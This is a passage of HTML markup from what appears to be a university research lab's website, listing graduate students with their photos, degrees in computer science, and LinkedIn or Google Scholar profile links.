data-colibri-id=\"182-c148\" class=\"h-global-transition-all h-heading style-862 style-local-182-c148 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-862 style-local-182-c148\">\n <!---->\n <!---->\n <h2 class=\"\">Graduates</h2>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c74\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-847 style-local-182-c74 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c75-outer\">\n <div data-colibri-id=\"182-c75\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c75 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c76\" class=\"d-block style-854 style-local-182-c76 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/10/cropped-cropped-cropped-282038166_2492815234187345_4129762528023780269_n-e1697205710763.jpg\" class=\"wp-image-1742 style-854-image style-local-182-c76-image\">\n <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c76-frameImage\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c77\" class=\"h-global-transition-all h-heading style-850 style-local-182-c77 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-850 style-local-182-c77\">\n <!---->\n <!---->\n <h4 class=\"\">Sundos Al Subhi</h4>\n </div>\n </div>\n <div data-colibri-id=\"182-c78\" class=\"h-text h-text-component style-851 style-local-182-c78 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>PhD Candidate\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"182-c79\" class=\"h-text h-text-component style-902 style-local-182-c79 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Computer Science\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"182-c80\" class=\"style-855 style-local-182-c80 position-relative h-element\">\n <!---->\n <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://www.linkedin.com/in/sundos-al-subhi-88bb97150\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c81-outer\">\n <div data-colibri-id=\"182-c81\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c81 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c82\" class=\"d-block style-849 style-local-182-c82 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/06/cropped-cropped-cropped-IMG_1240-scaled-1-e1697205818731.jpg\" class=\"wp-image-1744 style-849-image style-local-182-c82-image\">\n <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-849-frameImage style-local-182-c82-frameImage\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c83\" class=\"h-global-transition-all h-heading style-850 style-local-182-c83 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-850 style-local-182-c83\">\n <!---->\n <!---->\n <h4 class=\"\">Aaja Christie</h4>\n </div>\n </div>\n <div data-colibri-id=\"182-c84\" class=\"h-text h-text-component style-851 style-local-182-c84 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>PhD Candidate\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"182-c85\" class=\"h-text h-text-component style-901 style-local-182-c85 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Computer Science\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"182-c86\" class=\"style-853 style-local-182-c86 position-relative h-element\">\n <!---->\n <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://www.linkedin.com/in/aaja-christie-17573657/\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c87-outer\">\n <div data-colibri-id=\"182-c87\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c87 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c88\" class=\"d-block style-856 style-local-182-c88 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-cropped-Emma-e1697205932363.jpg\" class=\"wp-image-1745 style-856-image style-local-182-c88-image\">\n <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-856-frameImage style-local-182-c88-frameImage\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c89\" class=\"h-global-transition-all h-heading style-850 style-local-182-c89 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-850 style-local-182-c89\">\n <!---->\n <!---->\n <h4 class=\"\">Emma McDaniel</h4>\n </div>\n </div>\n <div data-colibri-id=\"182-c90\" class=\"h-text h-text-component style-851 style-local-182-c90 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>PhD Candidate\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"182-c91\" class=\"h-text h-text-component style-852 style-local-182-c91 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Computer Science\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"182-c92\" class=\"style-857 style-local-182-c92 position-relative h-element\">\n <!---->\n <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://www.linkedin.com/in/emmamcdaniel/\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://scholar.google.com/citations?user=Cwt8OwkAAAAJ&hl=en\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c93-outer\">\n <div data-colibri-id=\"182-c93\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c93 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c94\" class=\"d-block style-854 style-local-182-c94 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-cropped-sara-edwards1-e1697206932891.jpg\" class=\"wp-image-1754 style-854-image style-local-182-c94-image\">\n <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c94-frameImage\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c95\" class=\"h-global-transition-all h-heading style-850 style-local-182-c95 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-850 style-local-182-c95\">\n <!---->\n <!---->\n <h4 class=\"\">Sara Edwards</h4>\n </div>\n </div>\n <div data-colibri-id=\"182-c96\" class=\"h-text h-text-component style-851 style-local-182-c96 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>PhD Student, MS Graduate\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"182-c97\" class=\"h-text h-text-component style-902 style-local-182-c97 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Computer Science\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"182-c98\" class=\"style-855 style-local-182-c98 position-relative h-element\">\n <!---->\n <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://www.linkedin.com/in/sara-edwards-691b8331/\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c99-outer\">\n <div data-colibri-id=\"182-c99\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c99 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c100\" class=\"d-block style-854 style-local-182-c100 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-cropped-cropped-cropped-Ryan-e1697207029774.jpg\" class=\"wp-image-1756 style-854-image style-local-182-c100-image\">\n <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c100-frameImage\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c101\" class=\"h-global-transition-all h-heading style-850 style-local-182-c101 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-850 style-local-182-c101\">\n <!---->\n <!---->\n <h4 class=\"\">Ryan Garland</h4>\n </div>\n </div>\n <div data-colibri-id=\"182-c102\" class=\"h-text h-text-component style-851 style-local-182-c102 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>PhD Student, MS Graduate\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"182-c103\" class=\"h-text h-text-component style-902 style-local-182-c103 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Computer Science\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"182-c104\" class=\"style-855 style-local-182-c104 position-relative h-element\">\n <!---->\n <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://www.linkedin.com/in/ryan-g-aa71a0163\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c105-outer\">\n <div data-colibri-id=\"182-c105\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c105 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c106\" class=\"d-block style-854 style-local-182-c106 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-cropped-cropped-Jean-e1697206801281.jpg\" class=\"wp-image-1750 style-854-image style-local-182-c106-image\">\n <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c106-frameImage\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c107\" class=\"h-global-transition-all h-heading style-850 style-local-182-c107 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-850 